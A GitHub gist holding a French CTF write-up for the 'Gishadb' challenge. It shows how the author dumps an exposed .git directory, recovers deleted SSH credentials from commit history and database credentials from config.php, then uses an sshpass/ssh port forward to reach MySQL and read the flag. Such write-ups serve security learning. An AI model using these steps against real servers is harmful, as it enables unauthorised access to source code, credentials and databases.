Skip to content

Instantly share code, notes, and snippets.

@xl00t
Created October 22, 2023 12:39
Show Gist options
  • Save xl00t/41593568c14c45ea322720083815048d to your computer and use it in GitHub Desktop.
Save xl00t/41593568c14c45ea322720083815048d to your computer and use it in GitHub Desktop.

Gishadb - 481

16 Solves

Ce serveur écoute sur 2 ports ! 443 et 222. Trouvez un moyen d'obtenir le flag.
This server listen on two ports: 443 and 222. Find a way to get the flag.
https://gishadb.flag4all.sh

Auteur : Penthium2 (BZHack)

On trouve un repo git sur le webserver :

$ curl https://gishadb.flag4all.sh/.git/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /.git</title>
 </head>
 <body>
<h1>Index of /.git</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="COMMIT_EDITMSG">COMMIT_EDITMSG</a></td><td align="right">2023-05-25 12:53  </td><td align="right"> 24 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="HEAD">HEAD</a></td><td align="right">2023-05-25 12:43  </td><td align="right"> 23 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="branches/">branches/</a></td><td align="right">2023-05-25 12:43  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="config">config</a></td><td align="right">2023-05-25 12:43  </td><td align="right"> 92 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="description">description</a></td><td align="right">2023-05-25 12:43  </td><td align="right"> 73 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="hooks/">hooks/</a></td><td align="right">2023-05-25 12:43  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="index">index</a></td><td align="right">2023-05-25 12:53  </td><td align="right">217 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="info/">info/</a></td><td align="right">2023-05-25 12:43  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="logs/">logs/</a></td><td align="right">2023-05-25 12:44  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="objects/">objects/</a></td><td align="right">2023-05-25 12:53  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="refs/">refs/</a></td><td align="right">2023-05-25 12:43  </td><td align="right">  - </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.56 (Debian) Server at gishadb.flag4all.sh Port 80</address>
</body></html>

Alors on le recupere.

$ git-dumper https://gishadb.flag4all.sh/ git
$ cd git
$ git log
commit cfdccf9472e0b985abc372f90fa64352d744b5ad (HEAD -> master)
Author: penthium2 <penthium2@hotmail.fr>
Date:   Thu May 25 14:53:28 2023 +0200

    suppresion info preprod

commit 13c0faef33bf466602913bc3918094cfefea072f
Author: penthium2 <penthium2@hotmail.fr>
Date:   Thu May 25 14:52:44 2023 +0200

    ajout info ssh pour preprod

commit 6dbcaf8c22bbe74aa2562ac60f58602d8592347a
Author: penthium2 <penthium2@hotmail.fr>
Date:   Thu May 25 14:50:32 2023 +0200

    sécurisation

commit 02ef7e50a0bb9954d7819f8fd7c7b2c593db0d73
Author: penthium2 <penthium2@hotmail.fr>
Date:   Thu May 25 14:44:03 2023 +0200

    ipremier commit
(END)

$ git diff 13c0faef33bf466602913bc3918094cfefea072f
diff --git a/info_login b/info_login
deleted file mode 100644
index d904e9b..0000000
--- a/info_login
+++ /dev/null
@@ -1,2 +0,0 @@
-loginssh : gishadb@192.168.124.1
-pass : iop

En essayant de se login via ssh on se fait spam le terminal.. image

Alors on va local port forward mysql vers notre loopback et continuer a enumerer avec les credentials trouvé dans config.php

<?php
$cnx = new PDO('mysql:host=127.0.0.1;dbname=app;charset=utf8', 'app', 'db_Super_P4$$');
?>

Pane 1: sshpass -p 'iop' ssh -p 222 -L 3306:127.0.0.1:3306 -N gishadb@gishadb.flag4all.sh

Pane 2:

$ mysql -h 127.0.0.1 -u app -p app
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 47176
Server version: 10.5.21-MariaDB-0+deb11u1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [app]> show tables;
+---------------+
| Tables_in_app |
+---------------+
| hand          |
| users         |
+---------------+
2 rows in set (0.018 sec)

MariaDB [app]> select * from users;
+----+----------+-----------+-----------------------+
| id | lastname | firstname | email                 |
+----+----------+-----------+-----------------------+
|  1 | Deux     | Penthium  | penthium2@flag4all.sh |
+----+----------+-----------+-----------------------+
1 row in set (0.016 sec)

MariaDB [app]> select * from hand;
+----+-----------------------------+----------+
| id | finger                      | ring     |
+----+-----------------------------+----------+
|  1 | pouce                       | Penthium |
|  2 | index                       | Penthium |
|  3 | FLAG{TAK3_Care_Of_SSH_POWA} | Penthium |
|  4 | anulaire                    | Penthium |
|  5 | oriculaire                  | Penthium |
+----+-----------------------------+----------+
5 rows in set (0.016 sec)

MariaDB [app]> 

ggwp

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment